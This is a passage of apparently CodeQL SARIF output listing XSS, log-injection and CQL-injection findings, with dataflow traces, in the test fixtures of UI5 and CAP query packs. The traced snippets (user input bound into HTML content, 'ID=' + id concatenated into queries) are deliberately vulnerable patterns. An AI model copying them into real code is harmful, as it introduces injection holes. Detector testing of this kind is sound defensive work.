null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":532},"region":{"startLine":8,"startColumn":11,"endColumn":34}},"message":{"text":"data-content={/input}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":532},"region":{"startLine":5,"startColumn":11,"endColumn":32}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":532},"region":{"startLine":5,"startColumn":11,"endColumn":32}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":22,"startColumn":5,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"6e0d8f690e30e24a:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":8,"startColumn":5,"endLine":10,"endColumn":27}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":583},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":22,"startColumn":5,"endColumn":38}},"message":{"text":"content={/input}"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":15,"startColumn":5,"endLine":18,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":583},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":22,"startColumn":5,"endColumn":38}},"message":{"text":"content={/input}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":8,"startColumn":5,"endLine":10,"endColumn":27}},"message":{"text":"user-provided value"}},{"id":2,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":15,"startColumn":5,"endLine":18,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":8,"startColumn":5,"endLine":10,"endColumn":27}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":15,"startColumn":5,"endLine":18,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":559},"region":{"startLine":13,"startColumn":15,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"91ab068baa94c999:1","primaryLocationStartColumnFingerprint":"11"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":559},"region":{"startLine":9,"startColumn":13,"endColumn":23}},"message":{"text":"\"value\": \"{/input}\""}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":555},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":559},"region":{"startLine":13,"startColumn":15,"endColumn":25}},"message":{"text":"\"content\": \"{/input}\""}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":559},"region":{"startLine":9,"startColumn":13,"endColumn":23}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":559},"region":{"startLine":9,"startColumn":13,"endColumn":23}}}]},{"ruleId":"js/cap-log-injection","rule":{"id":"js/cap-log-injection","index":0,"toolComponent":{"index":8}},"message":{"text":"Log entry depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":9,"startColumn":32,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"7c291d40b7c61d4f:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":7,"startColumn":35,"endColumn":43}},"message":{"text":"msg.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":7,"startColumn":15,"endColumn":32}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":7,"startColumn":17,"endColumn":30}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":9,"startColumn":32,"endColumn":45}},"message":{"text":"messageToPass"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":7,"startColumn":35,"endColumn":43}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217},"region":{"startLine":7,"startColumn":35,"endColumn":43}}}]},{"ruleId":"js/cap-log-injection","rule":{"id":"js/cap-log-injection","index":0,"toolComponent":{"index":8}},"message":{"text":"Log entry depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":225},"region":{"startLine":9,"startColumn":32,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"7c291d40b7c61d4f:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":223},"region":{"startLine":7,"startColumn":39,"endColumn":47}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":223},"region":{"startLine":7,"startColumn":19,"endColumn":36}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":223},"region":{"startLine":7,"startColumn":21,"endColumn":34}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":223},"region":{"startLine":9,"startColumn":38,"endColumn":51}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":223},"region":{"startLine":9,"startColumn":36,"endColumn":53}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":225},"region":{"startLine":6,"startColumn":29,"endColumn":32}},"message":{"text":"msg"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":225},"region":{"startLine":7,"startColumn":35,"endColumn":38}},"message":{"text":"msg"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":225},"region":{"startLine":7,"startColumn":15,"endColumn":32}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":225},"region":{"startLine":7,"startColumn":17,"endColumn":30}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":225},"region":{"startLine":9,"startColumn":32,"endColumn":45}},"message":{"text":"messageToPass"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":223},"region":{"startLine":7,"startColumn":39,"endColumn":47}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":223},"region":{"startLine":7,"startColumn":39,"endColumn":47}}}]},{"ruleId":"js/cap-log-injection","rule":{"id":"js/cap-log-injection","index":0,"toolComponent":{"index":8}},"message":{"text":"Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":9,"startColumn":32,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"7c291d40b7c61d4f:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":231},"region":{"startLine":7,"startColumn":39,"endColumn":47}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":231},"region":{"startLine":7,"startColumn":19,"endColumn":36}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":231},"region":{"startLine":7,"startColumn":21,"endColumn":34}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":231},"region":{"startLine":9,"startColumn":38,"endColumn":51}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":231},"region":{"startLine":9,"startColumn":36,"endColumn":53}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":6,"startColumn":29,"endColumn":32}},"message":{"text":"msg"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":7,"startColumn":35,"endColumn":38}},"message":{"text":"msg"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":7,"startColumn":15,"endColumn":32}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":7,"startColumn":17,"endColumn":30}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":9,"startColumn":32,"endColumn":45}},"message":{"text":"messageToPass"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":7,"startColumn":35,"endColumn":43}},"message":{"text":"msg.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":7,"startColumn":15,"endColumn":32}},"message":{"text":"{ messageToPass }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":7,"startColumn":17,"endColumn":30}},"message":{"text":"messageToPass"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":9,"startColumn":32,"endColumn":45}},"message":{"text":"messageToPass"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":231},"region":{"startLine":7,"startColumn":39,"endColumn":47}},"message":{"text":"user-provided value"}},{"id":2,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":7,"startColumn":35,"endColumn":43}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":231},"region":{"startLine":7,"startColumn":39,"endColumn":47}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":7,"startColumn":35,"endColumn":43}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":15,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"77d560033d30e171:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":13,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":13,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":13,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":14,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":14,"startColumn":48,"endColumn":58}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":14,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":14,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":15,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":13,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":13,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":21,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"8ebfcdb6d8e3226a:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":19,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":19,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":19,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":20,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":20,"startColumn":48,"endColumn":58}},"message":{"text":"`ID=` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":20,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":20,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":21,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":19,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":19,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":27,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"d00fe3143fd387fc:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":25,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":25,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":25,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":26,"startColumn":54,"endColumn":56}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":26,"startColumn":48,"endColumn":58}},"message":{"text":"`ID=${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":26,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":26,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":27,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":25,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":25,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":38,"startColumn":7,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"29bf643a411d8976:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":37,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":37,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":37,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":38,"startColumn":42,"endColumn":44}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":38,"startColumn":33,"endColumn":44}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":37,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided 